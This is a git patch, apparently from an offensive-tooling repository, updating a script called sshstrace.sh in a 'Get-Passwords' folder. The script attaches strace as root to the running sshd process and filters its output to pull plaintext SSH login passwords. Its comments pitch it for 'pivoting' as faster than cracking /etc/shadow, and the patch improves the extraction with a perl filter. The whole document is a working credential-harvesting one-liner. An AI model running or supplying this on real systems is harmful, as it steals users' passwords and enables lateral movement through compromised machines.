From eecffb2ff2b98c05bcf896a91c4bed9f281a95ad Mon Sep 17 00:00:00 2001
From: dade <0xdade@users.noreply.github.com>
Date: Sat, 22 Jul 2017 20:01:25 -0700
Subject: [PATCH] Update sshstrace.sh

---
 Get-Passwords/sshstrace.sh | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/Get-Passwords/sshstrace.sh b/Get-Passwords/sshstrace.sh
index ef9594f..317a572 100644
--- a/Get-Passwords/sshstrace.sh
+++ b/Get-Passwords/sshstrace.sh
@@ -2,8 +2,7 @@
 #
 # In a facepalm revelation, it has come to my attention that you can use strace as root to collect passwords from sshd
 # Passwords are useful for pivoting and can be significantly faster than cracking /etc/shadow
-# 9 characters gets padded to 10 characters. 13 characters get padded to 14.
-# I've seen padding with 'r' and 't' so far
+# I think I fixed the random char padding problem, but now perl is required
 #
 
-strace -s 64 -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -Eo 'write\(4, "\\0\\0\\0\\[0-9]*[^\]{2,}[^\\0]"' | sed -e 's/write(4, "\\0\\0\\0\\[0-9]*\(.*\)"/\1/g'
+strace -s 128 -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -oP 'write\(4, "\\0\\0\\0\\[\d]*[^\\]{2,}[^\\0]"' | perl -pe 's/write\(4, "\\0\\0\\0\\([\d]+|[\w])(.*)"/\2/g'